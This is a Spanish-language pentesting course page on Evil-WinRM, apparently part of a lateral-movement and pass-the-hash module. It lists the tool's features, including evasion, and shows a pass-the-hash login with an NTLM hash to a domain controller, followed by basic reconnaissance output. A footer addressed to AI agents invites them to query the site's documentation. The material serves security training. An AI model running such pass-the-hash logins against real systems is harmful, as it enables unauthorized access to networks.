# Utilizando Evil-WinRm

{% hint style="info" %}
Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: <https://wa.link/ej3kiu>. ¡Te esperamos para empezar este viaje juntos!
{% endhint %}

Evil-WinRM es una herramienta utilizada en la seguridad informática y el pentesting para interactuar con sistemas Windows remotos que tienen habilitado el servicio Windows Remote Management (WinRM). WinRM es el servicio de gestión remota de Microsoft que permite a los usuarios ejecutar comandos Powershell y scripts de manera remota en máquinas de la red.

La herramienta Evil-WinRM fue diseñada específicamente para facilitar el acceso a máquinas que tienen habilitado este servicio y se ha convertido en una opción popular entre los pentesters y actores de amenazas por las siguientes razones:

**Características de Evil-WinRM:**

1. <mark style="color:red;">**Autenticación:**</mark>
   * Permite a los usuarios autenticarse en un host remoto utilizando credenciales de usuario válidas o técnicas como Pass-the-Hash.
2. <mark style="color:red;">**Ejecución Remota de Comandos:**</mark>
   * Posibilita la ejecución de comandos y scripts PowerShell en el host remoto, lo que es útil para la exploración y explotación de sistemas vulnerables.
3. <mark style="color:red;">**Transferencia de Archivos:**</mark>
   * Incluye funcionalidades para subir y descargar archivos desde y hacia el host remoto, lo cual es vital para la ejecución de herramientas de post-explotación o exfiltración de datos.
4. <mark style="color:red;">**Interactividad:**</mark>
   * Provee una shell interactiva que mejora la experiencia del usuario al interactuar con el sistema remoto.
5. <mark style="color:red;">**Evasión y Sigilo:**</mark>
   * Puede ser configurada para ejecutar comandos y scripts de manera sigilosa, ayudando a evadir soluciones de seguridad y auditoría de logs.

{% code overflow="wrap" %}

```powershell
kali@kali=> evil-winrm -u "spartancybersec.corp\admin" -H 64fbae31cc352fc26af97cbdef151e03 -i 3.14.245.175                                     
Evil-WinRM shell v3.5
                                     
*Evil-WinRM* PS C:\Users\admin\Documents> whoami
spartancybersec\admin

*Evil-WinRM* PS C:\Users\admin\Documents> hostname
First-DC

*Evil-WinRM* PS C:\Users\admin\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : spartancybersec.corp
   Link-local IPv6 Address . . . . . : fe80::dc16:bad5:b35:e9e9%4
   IPv4 Address. . . . . . . . . . . : 10.0.1.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.1.1
```

{% endcode %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://books.spartan-cybersec.com/cpad/movimiento-lateral/pass-the-hash-pth/utilizando-evil-winrm.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
